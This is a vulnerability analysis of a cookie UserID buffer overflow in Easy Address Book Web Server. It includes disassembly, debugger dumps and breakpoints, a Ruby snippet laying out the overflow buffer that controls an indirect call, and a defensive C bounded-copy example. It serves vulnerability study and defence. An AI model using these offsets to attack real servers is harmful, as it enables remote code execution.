Easy Address Book Web Server Buffer Overflow
Description
Easy Address Book Web Server suffers from a vulnerability while processing a user-supplied cookie, specifically the UserID parameter, which allows an attacker to cause a buffer overflow and either crash the service or gain arbitrary code execution in the context of the user running it. This was originally discovered by Tracy Turben, and was submitted to Metasploit as an exploit module by Muhammet Dilmac (of ADEOSec).
Technical Analysis
In addition, `var_DE64` is used to store the `UserID` information by a simple memcpy routine:

```asm
.text:0040F2D7 mov eax, ecx
.text:0040F2D9 mov esi, edi
.text:0040F2DB mov edi, edx
.text:0040F2DD push ebx
.text:0040F2DE shr ecx, 2
.text:0040F2E1 rep movsd
```
If `UserID` has a value of "AAAA", in a debugger the buffers would look like this:

```text
01EEB494 41414141 AAAA
01EEB498 00000000 ….
01EEB49C 00000000 ….
01EEB4A0 00000000 ….
01EEB4A4 00000000 ….
01EEB4A8 00000000 ….
01EEB4AC 00000000 ….
01EEB4B0 00000000 ….
01EEB4B4 00000000 ….
01EEB4B8 00000000 ….
01EEB4BC 00000000 ….
01EEB4C0 00000000 ….
01EEB4C4 00000000 ….
01EEB4C8 00000000 ….
01EEB4CC 00000000 ….
01EEB4D0 00000000 ….
01EEB4D4 01000101 .
01EEB4D8 016EE168 hán ASCII “2.60 ,MyDB Engine,Copyright_2002 MGH Software Inc.”
01EEB4DC 00518470 p„Q. abws.00518470
01EEB4E0 00518470 p„Q. abws.00518470
01EEB4E4 004F2F7C |/O. abws.004F2F7C
01EEB4E8 00000250 P..
```
In the above example, the range from 01EEB494 to 01EEB4D0 is exactly 64 bytes; this is our `var_DE64` buffer. Right below that is our `var_DE24`, which is what ESI points to at the time of the crash. At the 0x10th byte of ESI is where EDX is, which is used by the `CALL DWORD [edx+28h]` instruction. The following code represents this:

```ruby
buf = "A" * 64          # 64 bytes for var_DE64
buf << "BBBB"           # We start overwriting var_DE24 buffer here
buf << "C" * (16-4)     # Padding for [ESI+10h] so the 16th DWORD is our DDDD
buf << "DDDD"           # EDX (which will be used by the CALL DWORD [edx+28h] instruction)
buf << "E" * (4 * 100)  # Extra padding so we can see the overflow better
```
Since the overflow ends up writing an object in var_DE24 that then gets used by the function, this results in a type confusion (a string being treated as an object).
Breakpoints

- The first breakpoint is the alloca_probe call
- The second breakpoint is the destination buffer for the memcpy that copies the UserID value to var_DE64
- The third is the beginning of the vulnerable function

```text
0:006> bl
 0 e 0040f10a     0001 (0001)  0:**** abws+0xf10a
 1 e 0040f2db     0001 (0001)  0:**** abws+0xf2db
 2 e 0040f0f0     0001 (0001)  0:**** abws+0xf0f0
```
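As an added defensive example (not code from the assessment, the vendor, or the Metasploit module), the following C shows the bounded copy that the unchecked memcpy above lacks: it extracts the UserID value from a raw Cookie header and refuses to copy it when it would not fit the 64-byte `var_DE64`-sized buffer. The Cookie-header layout, the `probe_userid_length` helper and its sample values are constructed assumptions for the example.

```c
#include <stdio.h>
#include <string.h>

#define USERID_BUF 64   /* size of the fixed stack buffer var_DE64 */

/* Find the UserID value inside a raw Cookie header; *len gets the value
 * length (up to ';' or end of string).  Returns NULL if it is absent. */
static const char *find_userid(const char *cookie, size_t *len) {
    for (const char *p = cookie; *p; ) {
        while (*p == ' ' || *p == ';') p++;
        if (strncmp(p, "UserID=", 7) == 0) {
            p += 7;
            const char *end = strchr(p, ';');
            *len = end ? (size_t)(end - p) : strlen(p);
            return p;
        }
        if (!(p = strchr(p, ';'))) break;   /* skip to the next cookie */
    }
    return NULL;
}

/* Bounded replacement for the unchecked memcpy: copies UserID into the
 * 64-byte buffer only if it fits with a terminator.  Returns the copied
 * length, -1 if the cookie is absent, -2 if the value is too long. */
int copy_userid(const char *cookie, char out[USERID_BUF]) {
    size_t len;
    const char *val = find_userid(cookie, &len);
    if (!val) return -1;
    if (len >= USERID_BUF) return -2;
    memcpy(out, val, len);
    out[len] = '\0';
    return (int)len;
}

/* Constructed test helper: builds a cookie whose UserID value is n 'A's
 * (behind a decoy cookie) and runs copy_userid into a private buffer. */
int probe_userid_length(size_t n) {
    char cookie[256] = "session=abc; UserID=";
    char dest[USERID_BUF];
    size_t pre = strlen(cookie);
    if (n >= sizeof cookie - pre - 1) return -3;   /* sample too large */
    memset(cookie + pre, 'A', n);
    cookie[pre + n] = '\0';
    return copy_userid(cookie, dest);
}

int main(void) {
    printf("4 bytes -> %d, 100 bytes -> %d\n", probe_userid_length(4), probe_userid_length(100));
    return 0;
}
```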